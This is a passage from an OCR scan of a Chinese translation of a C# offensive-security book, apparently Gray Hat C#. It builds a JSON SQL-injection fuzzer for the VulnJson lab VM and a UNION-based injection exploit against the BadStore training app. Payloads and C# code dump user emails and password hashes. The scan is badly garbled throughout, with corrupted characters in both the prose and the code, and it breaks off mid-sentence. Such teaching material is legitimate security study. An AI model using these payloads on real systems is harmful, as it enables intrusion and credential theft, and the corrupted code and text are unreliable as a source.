Csharp: VulnjJson 的 小 型 Web 应 用 程序 ， 它 接受 JSON 同 时 使 用 其 中 的 信息 来 持久 化 并 搜索 与 用 户 相 关 数 据 。 已 经 创建 好 了 一 
个 现成 的 运行 这 个 程序 的 虚拟 设备 ， 可 以 在 VulnHub 网 站 (http://www.vulnhub.com/) 上 找到 。 


2.6.1 ”设置 存在 汤 洱 的 程序 
Csharp: VulnJson 是 一 个 OVA 文 件 ， 它 是 一 个 完全 独立 的 虚拟 机 归档 文件 ， 你 可 以 简单 地 将 其 导入 到 你 选择 的 虚拟 化 套 


件 。 在 大 多 数 情 况 下 ， 双 击 OVA 文 件 ， 你 的 虚拟 化 软件 应 该 目 动 导入 它 。 


2.6.2 ” 捕 铸 易 受 攻击 的 JSON 请 来 


一 旦 Csharp VulnjJson 运 行 ， 在 Firefox 中 打开 虚拟 机 上 的 80 问 口 ， 你 应 该 看 到 如 图 2-7 所 示 的 用 户 管理 界面 。 我 们 将 专注 于 
通过 创建 用 户 按钮 创建 用 户 和 此 按钮 在 创建 用 户 时 创建 的 HTTP 请 求 。 


(4) @ 192.168.1.56 


Create a user 


Usernarme 
whatthebobby 


Password 
propane1 


Age 
42 


Address Line 1 
123 Main St 


Address Line 2 


City 


Arlen 


Niddle Name 


Hill 


Create User 


说 了 | (图 - sooee a) (G7) (#] 会 ] 


List Users 


Search 


List Users 
fdsfdsa | Delete User 
IEWOU Delete User 
whatthebobby Delete User 


图 2-7 在 Firefox 中 打开 的 Csharp VulnJson Web 应 用 程序 


假设 Firefox 仍 然 设置 Burp Suite 作 为 HTTP 代 理 ， 填 写 创建 用 户 字 段 ， 然 后 单 击 Create User， 在 Burp Suite 的 请 求 窗 格 
使 用 JSON 散 列 中 的 用 户 信 息 生成 HTTP 请 求 ， 如 清单 2-20 所 示 。 


清单 2-20 ”包含 保存 到 数据 库 的 用 户 信 息 的 JJON 数 据 的 创建 用 户 请 求 


POST /Vulnerable.ashx HTTP/1.1 
Host: 192.168.1.56 


User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; TV:26.0) Gecko/20100101 Firefox/26.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 


Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Content-Type: application/json; charset=UTF-8 
Referer: http://192.168.1.56/ 

Content-Length: 190 

Cookie: ASP.NET SessionId=5D14CBCOD339F3F054674D8B 
Connection: keep-alive 

Pragma: no-cache 

Cache-Control: no-cache 


{"username":"whatthebobby","password": 


_ ine2 : ，City : 
"method":"create"} 


propane1 ，age :42, "line1":"123 Main St", 
Arlen ，Sstate : TX ，zip :78727，Tfirst : Hank ，middle :“，j1ast : Hill ， 


现在 右键 单 击 请 求 窗 格 ， 然 后 选择 Copy to File。 当 询问 在 你 的 计算 机 上 保存 HTTP 请 求 的 位 置 时 ， 请 选择 并 记 下 请 求 的 保 


存 位 置 ， 因 为 你 需要 将 路 径 传 递 给 模糊 测试 工具 。 


2.6.3 ”编写 对 JSON 进 行 模糊 测试 的 工具 


为 了 对 此 HTTP 请 求 进行 模糊 测试 ， 我 们 需要 将 JSON 与 请 求 的 其 余部 分 分 开 。 然 后 ， 我 们 需要 欠 代 JSON 中 的 每 个 键 / 值 


对 ， 并 更 改 该 值 以 尝试 从 Web 服 务 器 引 友 任何 可 能 的 SQL 错 误 。 


读 取 请 求 文件 


要 创建 对 JSON HTTP 请 求 进行 模糊 测试 的 工具 ,我们 先 从 一 个 已 知 的 HTTP 请 求 (Create User 请 求 ) 开始 。 使 用 以 前 保存 


的 HTTP 请 求 ， 可 以 读 取 请 求 并 开始 进行 模糊 测试 ， 如 清单 2-21 所 示 。 
清单 2-21: 局 动 了 对 JSON 参 数 模 糊 测试 的 过 程 的 Main 方 法 


public static void Main(string[ |] args) 
{ 
string Url = @args[0]; 
string requestFile = @args[1)|]; 
string[ | request = null; 


using (StreamReader rdr = @new StreamReader(File.@O0penRead(requestFile))) 


request = rdr.@ReadToEnd().@Split('\n’'); 


string json = @request[request.Length - 1]; 
JObject obj = @JObject.Parse(json); 


Console.WritelLine("Fuzzing POST requests to URL ”+ ur]); 


IterateAndFuzz(url, obj); 
} 


我 们 做 的 第 一 件 事 是 将 传递 给 模糊 测试 工具 的 第 一 个 @ 和 第 二 个 @ 参 数 存 储 在 两 
们 还 声明 一 个 字符 串 数组 ， 在 从 文件 系统 读 取 请 求 之 后 ， 将 存储 HTTP 请 求 中 的 数据 。 


zi 旦 
个 变量 


(分 别 为 url 和 requestFile) 中 。 我 


在 using 语 句 中 ， 使 用 File.OpenRead () @ 打 开 请 求 文件 进行 读 取 ， 并 将 返回 的 文件 流传 递 给 StreamReader 构 造 遂 数 
@。 通 过 实例 化 新 的 StreamReader 类 ， 可 以 使 用 ReadToEnd () 方法 @ 读 取 文 件 中 的 所 有 数据 。 仍 使 用 split () 方法 @ 分 隔 
请 求 文件 中 的 数据 ， 将 换行 符 传递 给 该 方法 作为 分 隔 的 标志 。HTTP 协 议 规 定 使 用 新 的 一 行 (也 就 是 回 车 符 和 换行 符 ) 将 头 部 与 
要 上 友 送 的 数据 分 开 。9split () 返回 的 字符 串 数组 被 分 配给 之 前 声明 的 request 变 量 。 


读 取 和 | 分隔 请 求 文件 后 ， 可 以 获取 我 们 需要 的 JSON 数 据 ， 并 且 开 始 迭 代 JSON 键 / 值 对 来 查找 SQL 注 入 向 量 。 我 们 想 要 的 


JSON 是 HTTP 请 求 的 最 后 一 行 ， 它 是 request 数 组 中 的 最 后 一 个 元 素 。 因 为 0 是 数组 中 的 第 一 个 元 素 ， 所 以 我 们 从 request 数 组 长 
度 中 减 去 1， 使 用 返回 的 结果 来 获取 request 数 组 中 的 最 后 一 个 元 素 ， 并 将 值 分 配给 字符 串 json@。 


一 旦 我 们 从 HTTP 请 求 中 分 离 出 JJON ， 我 们 可 以 解析 json 字 符 串 并 创建 一 个 JObject， 我 们 可 以 使 用 JObject.Parse () @ 编 
程 迭代 它 。JObject.NET 库 中 提供 了 JObject 类 ， 可 以 通过 NuGet 包 管理 器 或 http://www.newtonsoft.com/json/ 免 费 获 取 。 我 
们 将 在 整 本 书 中 使 用 这 个 库 。 


在 创建 新 的 JObject 之 后 ， 打 印 一 个 状态 行 以 通知 用 户 我 们 正在 对 给 定 的 URL 的 POST 请 求 进 行 模糊 测试 。 最 后 ， 给 
lterateAndFuzz () 方法 传递 JObject 和 URLG@ 使 其 处 理 JSON 并 对 Web 应 用 程序 进行 模糊 测试 。 


迭代 JSON 键 和 值 


现在 我 们 可 以 开始 遍历 每 个 JSON 键 / 值 对 ， 并 对 每 一 对 进行 设置 ， 以 测试 一 个 可 能 的 SQL 注 入 向 量 。 清 单 2-22 显 示 了 如 何 使 
用 lterateAndFuzz () 方法 完成 此 操作 。 


清单 2-22: lterateAndFuzz () 方法 决定 了 对 JSON 中 的 哪个 键 / 值 对 进行 模糊 测试 


private static void IterateAndFuzz(string url, JObject obj) 
foreach (var pair in (JObject)@obj.DeepClone()) 


if (pair.Value.Type == @JTokenType.String || pair.Value.Type == ©@JTokenType.Integer) 
Console.WritelLine("Fuzzing key: ”+ pair.Key); 


if (pair.Value.Type == JTokenType.Integer) 
@Console.WritelLine("Converting int type to string to fuzz"); 


JToken oldVal = @pair.Value; 
obj[pair.Key|] = @pair.Value.ToString() + "'"; 


》 


if (@Fuzz(url, obj.Root)) 
Console.WritelLine("SOL injection vector: ”+ pair.Key); 
else 


Console.WritelLine (pair.Key + ”does not seem vulnerable."); 


@obj[pair.Key] = oldVal; 
} 


lterateAndFuzz () 方法 以 foreach 循 环 遍历 JObject 中 的 键 / 值 对 开始 。 因 为 我 们 将 通过 在 其 中 插入 单 引 号 来 改变 JSON 中 
的 值 ， 所 以 调用 DeepClone () 以 便 获 得 与 开始 的 对 象 相同 的 单独 的 对 象 。 这 人 允许 我 们 在 改变 一 个 JSON 键 / 值 对 的 副本 的 同 
时 欠 代 另 一 个 。 


(我 们 需要 复制 一 份 ， 因 为 在 foreach 循 环 中 ， 你 不 能 改变 你 正在 迭代 的 对 象 。 ) 


在 foreach 循 环 中 ， 我 们 测试 当前 键 / 值 对 中 的 值 是 人 否 为 JTokenType.string@ 或 JokenType.IntegerG@， 并 且 如 果 值 是 字符 
串 或 整数 类 型 ， 则 继续 对 该 值 进行 模糊 测试 。 在 打印 消息 @ 以 提醒 用 户 我 们 正在 对 哪个 键 进行 模糊 测试 时 ， 我 们 测试 该 值 是 否 为 
一 个 整数 ， 以 便 让 用 户 知 道 我 们 将 值 从 整数 转换 为 字符 串 。 


注意 : 由 于 JSON 中 的 整数 没有 引号 ， 并 且 必须 是 整数 或 浮 点 ， 所 以 使 用 单 引 号 插入 值 将 导致 解析 异常 。 许 多 使 用 Ruby on 
Rails 或 Python 构建 的 弱 类 型 的 Web 应 用 程序 不 会 关心 JSON 值 是 否 更 改 了 类 型 ， 但 使 用 Java 或 C# 构 建 的 强 类 型 的 Web 应 用 程序 可 能 


无 法 正常 运行 。Cshatp VulnJson Web 应 用 程序 不 关心 类 型 是 否 有 意 更 改 。 


接 下 来 ,我们 将 旧 值 存储 在 oldVal 变 量 @@ 中 ， 以 便 在 对 当前 键 / 值 对 进行 模糊 测试 后 可 以 蔡 换 它 。 存 储 旧 值 后 ， 我 们 重新 将 
当前 的 值 @ 赋 予 原来 的 值 ， 但 是 在 值 的 未 尾 加 上 一 个 单 引 号 ， 以 全 确保 如 果 它 被 放 在 SQL 查 询 中 ， 则 导致 解析 异常 。 


要 确定 更 改 的 值 是 否 会 导致 Web 应 用 程序 中 的 错误 ， 我 们 传递 更 改 的 JSON 和 URL 到 Fuzz () 方法 @ (下 面 讨 论 ) ， 该 方法 
返回 一 个 布尔 值 ， 告 知 我 们 JSON 值 可 能 容易 受到 SQL 注入 的 攻击 。 如 果 Fuzz () 返回 true， 则 通知 用 户 该 值 可 能 容易 受到 SQL 
注入 的 影响 。 如 果 Fuzz () 返回 false， 则 通知 用 户 该 键 看 起 来 并 不 容易 受到 攻击 。 


一 旦 我 们 确定 一 个 值 是 人 否 容易 受到 3QL 注 入 的 影响 ， 我 们 将 改变 后 的 J3JON 值 蔡 换 为 原来 的 信 @ 并 转 到 下 一 个 键 / 值 对 。 
使 用 HTTP 请 求 进行 模糊 测试 


最 后 ， 我 们 需要 使 用 污染 的 JJON 值 及 送 实际 的 HTTP 请 求 ， 并 从 服务 器 读 取 听 应 ， 以 确定 该 值 是 否 可 以 注入 。 清 单 2-23 显 
示 了 Fuzz () 方法 如 何 创建 HTTP 请 求 并 测试 特定 字符 串 的 啊 应 以 确定 JSON 值 是 否 易 受 3QL 注 入 漏洞 的 影响 。 


清单 2-23: 与 服务 器 进行 实际 通信 的 Fuzz () 方法 


private static bool Fuzz(string url, JToken obj) 


l 
byte[] data = System.Text.Encoding.ASCII.@CetBytes(obj.@ToString()); 


HttpWebRequest req = (HttpWebRequest)@WebRequest.Create(url); 
req.Method = “POST ; 

req.ContentLength = data.Length ; 

req.ContentType = "application/javascript"; 

using (Stream stream = req.@GetRequestStream()) 
stream.@Write(data, 0, data.Length); 


try 


{ 
req.@OaetResponse( ) ; 


catch (WebException e) 


{ 
string resp = string.Empty; 
using (StreamReader r = new StreamReader(e.Response.@GCetResponseStream())) 
resp = r.@ReadToEnd(); 


return (resp.®@Contains("syntax error") || resp.®@Contains("unterminated")); 


} 


return false; 


} 


因为 需要 将 整个 JSON 字 符 串 作为 字 节 友 送 ， 所 以 我 们 将 Tostring () @ 返 回 的 JoObject 的 字符 串 版 本 传递 给 
GetBytes () @ 万 法 ， 该 万 法 返回 一 个 表示 JSON 字 符 串 的 字 节 数组 。 我 们 还 通过 从 WebRequest 类 调用 静态 Create () @ 方 法 
来 构建 初始 HTTP 请 求 以 创建 一 个 新 的 WebRequest， 并 将 生成 的 对 象 转换 为 HttpWebRequest 类 。 接 下 来 ， 我 们 设置 HTTP 方 
法 ， 内 容 长 度 和 请 求 的 内 容 类 型 。 我 们 将 Method 属 性 设置 为 POST， 因 为 默认 值 为 GET， 并 且 将 ContentLength 属 性 设置 为 我 
们 将 要 发 送 的 字 节 数组 的 长 度 。 最 后 ,设置 ContentType 为 application/javascript， 以 确保 Web 服 务 器 知道 它 正在 接收 的 数据 
应 该 是 格式 正确 的 JSON。 


现在 我 们 将 JSON 数 据 写 入 请 求 流 。 我 们 调用 GetRequestStream () 方法 @ 并 将 返回 的 流 赋值 给 using 语 句 中 的 变量 使 得 我 
们 的 流 在 使 用 后 被 妥善 处 理 。 然 后 调用 流 的 Write () 方法 @， 它 有 三 个 参数 : 包含 我 们 的 JSON 数 据 的 字 节 数组 ， 我 们 开始 写 
的 数组 的 索引 ， 以 及 我 们 要 写 入 的 字 节 数 。 (因为 我 们 要 写 入 全 部 的 内 容 ， 所 以 我 们 传递 数组 的 整个 长 度 。) 


要 获取 服务 器 返回 的 响应 ， 我 们 创建 一 个 try 块 ， 以 便 我 们 可 以 捕获 任何 异常 并 检索 其 响应 。 我 们 在 try 块 中 调用 
GetResponse () @ 来 党 试 从 服务 器 检索 响应 ， 但 是 我 们 只 关心 HTTP 返 回 码 为 500 或 更 高 的 响应 ， 这 会 导致 GetResponse () 
抛 出 异常 。 


为 了 捕获 这 些 响 应 ， 我 们 使 用 一 个 catch 块 跟随 try 块 ， 在 其 中 调用 GetResponse-Stream () 并 从 返回 的 流 中 创建 一 个 新 
的 StreamReader。 使 用 流 的 ReadToEnd () 方法 @@， 我 们 将 服务 器 的 响应 仓储 在 字符 串 变 量 resp 中 (在 try 块 之 前 声明 ) 。 


要 确定 友 送 的 值 是 否 可 能 导致 SQL 错误 ， 我 们 测试 响应 中 是 否 包含 SQL 错误 中 的 两 个 已 知 字符 串 忆 一。 第 一 个 字符 
串 “syntax error”@ 是 MySQL 错 误 中 通常 存在 的 字符 串 ， 如 清单 2-24 所 示 。 


清单 2-24: 包 合 语法 错误 的 示例 MySQL 错 误 消息 


ERROR: 42601: syntax error at or near &quot;dsa&quot; 


第 二 个 字符 串 “unterminated” 人 @ 出 现在 当 一 个 字符 串 没 有 被 终止 时 ， 如 清单 2-25 所 示 。 


清单 2-25: 包含 未 终止 的 MySQL 错 误 消 息 


ERROR: 42601: unterminated quoted string at or near "'); " 


任何 错误 消息 的 出 现 可 能 意味 着 应 用 程序 中 存在 SQL 注 入 漏洞 。 如 果 返 回 的 错误 的 啊 应 包含 任何 一 个 字符 串 ， 我 们 将 给 调用 
万 法 返回 一 个 true 值 ， 这 意味 着 我 们 认为 应 用 程序 是 易 受 攻 击 的 。 人 否则 ， 返 回 false。 


2.6.4 ” 测 趟 对 JSON 进 行 模糊 测试 的 工具 


完成 了 对 HTTP JSON 请 求 进行 模糊 测试 所 需 的 三 种 方法 之 后 ， 我 们 可 以 测试 Create User HTTP 请 求 ， 如 清单 2-26 所 示 。 


清单 2-26: 在 Csharp VulnJson 应 用 程序 上 运行 对 JSON 进 行 模糊 测试 的 工具 的 输出 


$ fuzzer.exe http://192.168.1.56/Vulnerable.ashx /Users/bperry/req vulnjson 
Fuzzing POST requests to URL http://192.168.1.13/Vulnerable.ashx 
Fuzzing key: username 

SOL injection vector: username 
Fuzzing key: password 

SOL injection vector: password 
Fuzzing key: age@ 

Converting int type to string to fuzz 
SOL injection vector: age 

Fuzzing key: line1 

SOL injection vector: line1 

Fuzzing key: line2 

SOL injection vector: line2 

Fuzzing key: city 

SOL injection vector: city 

Fuzzing key: state 

SOL injection vector: state 

Fuzzing key: zip® 

Converting int type to string to fuzz 
SOL injection vector: zip 

Fuzzing key: first 

first does not seem vulnerable. 
Fuzzing key: middle 

middle does not seem vulnerable. 
Fuzzing key: last 

last does not seem vulnerable. 
Fuzzing key: method® 


method does not seem vulnerable. 


在 Create User 请 求 上 运行 模糊 测试 工具 应 该 显示 大 多 数 参 数 容易 受到 SQL 注 入 攻击 (以 SQL 注 入 向 量 开 头 的 行 ) ， 由 Web 
应 用 程序 使 用 的 来 确定 要 完成 哪个 操作 的 JSON 键 method@ 除 外 。 请 注意 ， 即 使 是 JSON 中 的 原来 为 整数 的 ageH 和 zip@ 参 数 ， 
如 果 在 测试 时 将 其 转换 为 字符 串 ， 那 么 它们 也 是 易 受 攻击 的 。 


2.7 利用 SQL 注 入 


找到 可 能 的 SQL 注入 只 是 渗透 测试 者 工作 的 一 半 ， 利 用 它们 是 更 重要 和 更 困难 的 另 一 半 。 在 本 章 的 开头 ， 我 们 使 用 了 一 个 
BadStore 中 的 URL 来 对 HTTP 查 询 字 符 串 参数 进行 模糊 测试 ， 其 中 一 个 易 受 攻击 的 查询 字符 串 参 数 名 为 searchquery (请 参阅 清 
单 2-13) 。URL 碍 询 字符 串 参 数 searchquery 容 易 受 到 两 种 类 型 的 SQL 注入 攻击 。 这 两 种 注入 类 型 (基于 布尔 的 和 基于 UNION 
的 ) 都 是 非常 有 用 的 ， 所 以 我 将 使 用 同样 的 存在 漏洞 的 Bad-Store URL 来 描述 这 两 种 类 型 的 使 用 方法 。 


UNION 在 利用 SQL 注入 时 更 容易 使 用 。 当 你 能 够 控制 SQL 查询 的 末尾 时 ， 可 以 在 ?SELECT 查询 注入 中 使 用 UNION。 可 以 将 
一 个 联合 语句 附加 到 SELECT 语 句 结束 的 攻击 者 可 以 将 比 程 序 员 所 期 望 的 更 多 的 数据 返回 到 Web 应 用 程序 。 


实现 UNION 注 入 的 最 棘手 的 部 分 之 一 是 平衡 询 。 本 质 上 ，UNION 子 句 返回 的 列 必 须 和 原始 SELECT 语句 返回 的 列 相同 。 另 
一 个 挑战 在 于 通过 编程 告诉 你 注入 的 结果 出 现在 Web 服 务 器 的 啊 应 中 。 


2.7.1 手工 进行 基于 UNION 的 注入 


使 用 基于 UNION 的 SQL 注 入 是 从 数据 库 检 索 数据 的 最 快 的 方法 。 为 了 使 用 这 种 技术 从 数据 库 检 索 攻击 者 控制 的 数据 ， 我 们 
必须 构建 一 个 有 效 载 何以 检索 与 Web 应 用 程序 中 的 原始 SQL 查 询 相 同 数量 的 列 。 一 旦 平衡 列 的 数目 ,我 们 需要 能 够 通过 编程 在 
HTTP 响 应 中 从 数据 库 中 查找 数据 。 


当 尝 试 平衡 列 的 数目 但 是 列 的 数目 并 不 相同 时 ， 通 常 Web 应 用 程序 使 用 MySQL 返 回 的 错误 类 似 于 清单 2-27 所 示 。 
清单 2-27: 当 右 侧 的 UNION 和 左 侧 的 SELECT 查 询 返 回 列 的 数目 不 相同 时 的 MySQL 错 误 示例 


The used SELECT statements have a different number of columns... 


让 我 们 看 看 BadStore Web 应 用 程序 中 使 用 的 易 受 攻击 的 代码 (badstore.cgi， 第 203 行 ) 选择 的 列 数 ( 见 清单 2-28) 。 


清单 2-28: BadStore Web 应 用 程序 中 存在 漏洞 的 那 一 行 选择 了 四 列 


$sql="SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE '$squery' IN (itemnum,sdesc,1desc)"; 


平衡 SELECT 语 句 需 要 进行 一 些 测试 ,但 是 读 取 BadStore 的 源 代码 可 知 ， 这 个 特定 的 SELECT 和 查询 返回 四 列 。 当 将 URL 编 码 
的 空格 传递 到 有 效 载 集中 时 ， 如 清单 2-29 所 示 ， 我 们 在 搜索 结果 中 将 找到 返回 为 一 行 的 hacked.。 


清单 2-29: 正确 平衡 的 SQL 注 入 将 hacked 从 数据 库 中 返回 
searchquery=fdas +UNION+ALL+SELECT+NULL, NULL, hacked , NULL%23 
当 此 有 效 载 荷 中 的 searchquery 值 传递 到 应 用 程序 时 ，searchquery 变 量 直接 用 于 发 送 到 数据 库 的 SQL 查询 中 ， 我 们 将 原始 
SQL 查 询 (清单 2-28) 转换 为 程序 员 并 不 期 性 的 新 的 SQL 查询 ， 如 清单 2-30 所 示 。 
清单 2-30: 市 有 附加 的 有 效 载 傈 的 完整 SQL 查询 返回 hacked 


SELECT itemnum, sdesc, ldesc, price FROM itemdb WHERE ‘fdas' UNION ALL SELECT 
NULL, NULL, ‘hacked’', NULL@# ' IN (itemnum,sdesc,1Ldesc ) 


使 用 井 号 @ 来 截断 原始 SQL 查 询 ， 将 有 效 载 傈 后 面 的 任何 SQL 人 代码 转换 成 不 会 被 MySQL 运 行 的 注释。 现在 ,我 们 希望 在 
Web 服 务 器 响应 中 返回 的 任何 额外 的 数据 (在 这 里 是 hacked 这 个 词 ) 应 该 在 UNION 的 第 三 列 中 。 


在 漏洞 被 成 功利 用 之 后 ， 人 们 可 以 很 容易 地 确定 在 网 页 中 显示 的 有 效 载 集 返回 的 数据 。 但 是 ， 计 算 机 需要 被 告知 在 哪里 可 以 
查找 从 SQL 注 入 漏洞 中 返回 的 任何 数据 。 编 程 检 测 攻 击 者 控制 的 数据 在 服务 器 响应 中 的 位 置 可 能 会 比较 困难 。 为 了 使 它 更 容易 ， 
我 们 可 以 使 用 SQL 销 数 CONCAT 把 我 们 实际 关心 的 数据 和 已 知 的 标记 连接 在 一 起 ， 如 清 蛙 2-31 所 示 。 


清单 2-31: 返回 单词 hacked 的 searchquery 参 数 的 示例 有 效 载 丛 
searchquery=fdsa' +UNION+ALL+SELECT+NULL, NULL, CONCAT(Ox71766a7a71, 'hacked' ,Ox716b626b71), NULL# 
清单 2-31 中 的 有 效 载荷 使 用 十 六 进 制 值 将 数据 添加 至 额外 的 hacked 值 的 左 侧 和 右 侧 。 如 果 有 效 载荷 从 Web 应 用 程序 返回 到 
HTML 中 ， 则 使 用 正则 表达 式 匹 配 原 始 有 效 载 丛 会 非常 简单 。 在 这 个 例子 中 ，0x71766a7a71 是 qvjzq9，0x716b626b71 是 


qkbkq。 如 果 注 入 有 效 ， 响 应 应 该 包含 qvjzqhackedqkbkq。 如 果 注 入 不 起 作用 并 且 搜 索 结 果 被 回 传 ， 那 么 诸如 
qvjzq (.*) qkbkq 的 正则 表达 式 将 不 匹配 原始 有 效 载 傈 中 的 十 六 进 制 值 。MySQL CONCAT () 水 数 是 确保 我 们 的 漏洞 利用 从 


Web 服 务 器 响应 获取 正确 数据 的 简便 方法 。 


清单 2-32 显 示 了 一 个 更 有 用 的 示例 。 在 这 里 ， 我 们 替换 以 前 的 有 效 载 伍 中 的 CONCAT () 沙 数 以 返回 由 已 知 的 左右 标记 包 
的 当前 数据 库 名 。 


清单 2-32: 返回 当前 数据 库 名 称 的 示例 有 效 载 丛 
CONCAT (Ox7176627a71, DATABASE(), 0x71766b7671) 
在 BadStore 搜 索 函 数 上 注入 的 结果 应 该 是 qvbzqbadstoredbqvkvq。 像 qvbzq (.*) qvkvq 这 样 的 正则 表达 式 应 返回 当前 数 
据 库 名 badstoredb。 


现在 我 们 知道 如 何 有 效 地 从 数据 库 中 获取 值 ， 我 们 可 以 使 用 UNION 注 入 开始 从 当前 数据 库 中 抽取 数据 。 大 多 数 Web 应 用 程 
序 中 的 一 个 特别 有 用 的 表格 是 用 尸 表 。 如 清单 2-33 所 示 ， 我 们 可 以 轻松 地 使 用 前 面 换 述 的 UNION 注 入 技术 从 用 尸 表 (userdb) 
中 枚 举 用 户 及 其 密码 散 列 值 。 


清单 2-33: 此 有 效 载荷 从 Badstore 数 据 库 中 提取 电子 邮件 和 密码 ， 由 左 、 中 、 右 标记 分 隔 


searchquery=fdas '+UNION+ALL+SELECT+NULL，NULL，CONCAT(Ox716b717671，emai]， 
0x776872786573，passwd,0x71767a7a71) ，NULL+FROM+badstoredb .userdb# 


如 果 注 入 成 功 ， 结 果 将 显示 在 网 页 的 表 项 上 。 


2.7.2 ”编程 进行 基于 UNION 的 注入 


现在 来 看 看 如 何 使 用 一 些 C 拓 0HTTP 类 编程 利用 这 个 漏洞 。 通 过 将 清单 2-33 中 显示 的 有 效 载 倚 放 入 searchquery 参 数 中 ， 我 
们 应 该 在 网 页 中 看 到 一 个 包含 用 户 名 和 密码 散 列 的 表 项 。 我 们 需要 做 的 就 是 发 送 单 个 HTTP 请 求 ， 然 后 使 用 正则 表达 式 从 HTTP 服 
务 器 的 响应 中 提取 标记 中 的 电子 邮件 和 密码 散 列 。 


创建 标记 以 查找 用 尸 名 和 密码 


特务 ， 我 们 需要 为 正则 表达 了 式 创 建 标 记 ， 如 清单 2-34 所 示 。 这 些 标记 将 用 于 摘 述 在 SQL 注入 期 间 从 数据 库 返 回 的 值 。 我 们 硕 
望 使 用 HTML 源 代码 中 不 六 可 能 出 现 的 随机 的 字符 串 以 便 正 则 表达 陈 从 HTTP 响 应 中 返回 的 HTML 中 只 能 获取 用 记名 和 密码 。 


清单 2-34: 创建 要 在 基于 UNION 的 SQL 注入 有 效 载 荷 中 使 用 的 标记 


string frontMarker = @ FrOnTMaRker ; 

string middleMarker = @ mldDlEMaRker'; 

string endMarker = 四 eNdMaRker ; 

string frontHex = string.@Join("", frontMarker.@Select(c => ((int)c).ToString("X2"))); 
string middleHex = string.Join("", middleMarker.Select(c => ((int)c).ToString("X2"))); 
string endHex = string.Join("", endMarker.Select(c => ((int)c).ToString("X2"))); 


我 们 以 创建 三 个 字符 串 作为 开始 @、 中 间 @ 和 结束 @ 标 记 。 它 们 将 用 于 查找 和 分 隔 我 们 在 HTTP 响 应 中 从 数据 库 中 提取 的 用 
户 名 和 密码 。 我 们 还 需要 创建 有 效 载荷 中 使 用 的 标记 的 十 入 进 制 表示 。 为 此 ， 需 要 对 每 个 标记 进行 一 点 处 理 。 


我 们 使 用 LINQ 方 法 Select () @ 饥 历 标记 字符 捉 中 的 每 个 字符 ， 将 每 个 字符 转换 为 其 十 六 进 制 表示 形式 ， 并 返回 处 理 后 的 
数组 。 在 这 种 情况 下 ， 它 返回 一 个 两 字 节 字符 串 的 数组 ， 每 个 字符 串 都 是 原始 标记 中 字符 的 十 六 进 制 表示 形式 。 


为 了 从 该 数组 创建 一 个 完整 的 十 六 进 制 字符 串 ， 我 们 使 用 Join () 方法 @ 来 连接 数组 中 的 每 个 元 素 ， 创 建 一 个 表示 每 个 标记 
的 十 7 进 制 字 符 串 。 


使 用 有 效 载 傈 构建 URL 
现在 我 们 需要 构建 URL 和 有 效 载 从 来 友 送 HTTP 请 求 ， 如 清单 2-35 所 示 。 
清单 2-35: 在 漏洞 利用 的 Main () 方法 中 使 用 有 效 载 集 构建 URL 


string url = @'"http://" + @args|0| + "/cgi-bin/badstore.cgi",; 


string payload = fdsa UNION ALL SELECT',; 

payload += " NULL, NULL, NULL, CONCAT(Ox"+frontHex+", IFNULL(CAST(email AS"; 
payload += " CHAR), Ox20),0x"+middleHex+", IFNULL(CAST(passwd AS"; 

payload += " CHAR), Ox20), Ox"+endHex+") FROM badstoredb.userdb# "; 


url += @"?searchquery=" + Uri.@EscapeUriString(payload) + "&action=search",; 


我 们 使 用 传递 给 漏洞 利用 部 分 的 第 一 个 参数 @ ( 即 BadStore 的 IP 地 址 ) 创建 URL@ 友 出 请 求 。 创 建 基本 的 URL 后 ,我 们 创建 
用 于 从 数据 库 返 回 用 尸 名 和 密码 散 列 值 的 有 效 载 伍 ， 包 括 用 来 分 离 用 尸 名 和 密码 的 用 标记 创建 的 3 个 十 六 进 制 字符 串 。 如 前 所 
述 ， 我们 以 十 六 进 制 编码 标记 ， 以 确保 在 没有 想 要 的 数据 的 情况 下 ， 正 则 表达 式 不 会 意外 地 匹配 它们 并 返回 垃圾 数据 。 最 后 ， 通 
过 将 有 漏洞 的 查询 字符 捉 参 数 忆 有效 载 倚 附 加 a 到 基本 的 URL@ 上 来 将 有 效 载 倚 和 URL 组 合 到 一 起 。 为 了 确保 有 效 载体 不 包含 任何 
HTTP 协 议 中 的 特殊 字符 ， 在 将 其 插入 查询 字符 捉 之 前 ， 应 将 有 效 载 集 传递 给 EscapeUri-String () @。 


友 送 HTTP 请 求 
我 们 现在 准备 发送 请 求 并 接收 使 用 SQL 注入 有 效 载 倚 从 数据 库 中 提取 的 用 户 名 和 密码 散 询 的 HTTP 响 应 ( 见 清单 2-36) 。 
清单 2-36: 创建 HTTP 请 求 并 从 服务 器 读 取 啊 应 

HttpWebRequest request = (HttpWebRequest)WebRequest.@Create(ur]l); 

string response = string.Empty; 


using (StreamReader reader = @new StreamReader(request.GetResponse().GetResponseStream())) 
response = reader.®@ReadToEnd(); 


我 们 通过 创建 一 个 新 的 HttpWebRequest@ 来 创建 一 个 基本 的 GET 请 求 ， 其 中 包 售 了 先前 构建 的 包含 SQL 注 入 有 效 载 答 的 
URL。 然 后 ， 我 们 声明 一 个 字符 串 来 保存 我 们 的 响应 ， 默 认 情况 下 为 一 个 空 字符 串 。 在 using 语 句 的 上 下 文中 ， 我 们 实例 化 一 个 
StreamReader@) 并 将 响应 @ 读 入 response 字 符 串 。 现 在 有 了 服务 器 的 响应 ， 我 们 可 以 使 用 标记 创建 一 个 正则 表达 式 以 便 在 
HTTP 响 应 中 查找 用 户 名 和 密码 ， 如 清单 2-37 所 示 。 


清单 2-37: 将 服务 器 响应 与 正则 表达 式 匹 配 以 提取 数据 库 中 的 值 


Regex payloadRegex = @new Regex(frontMarker + "(.*?)" + middleMarker + "(.*?)" + endMarker); 
MatchCollection matches = payloadRegex.@Matches(response); 
foreach (Match match in matches) 


{ 


Console.@WriteLine("Username: ”+ match.@aroups [1].Value + "\t "); 
Console.Write("Password hash: ”+ match.@Qroups[2].Value) ; 


} 
} 


这 里 我 们 从 HTTP 响 应 中 找到 并 打印 使 用 SQL 注入 检索 的 值 。 我 们 使 用 Regex 类 @ (在 命名 空间 
System.Text.RegularExpressions 中 ) 创建 一 个 正则 表达 式 。 此 正则 表达 式 包 含 两 个 表达 式 组 ， 它 们 使 用 前 面 定 义 的 开始 标记 、 
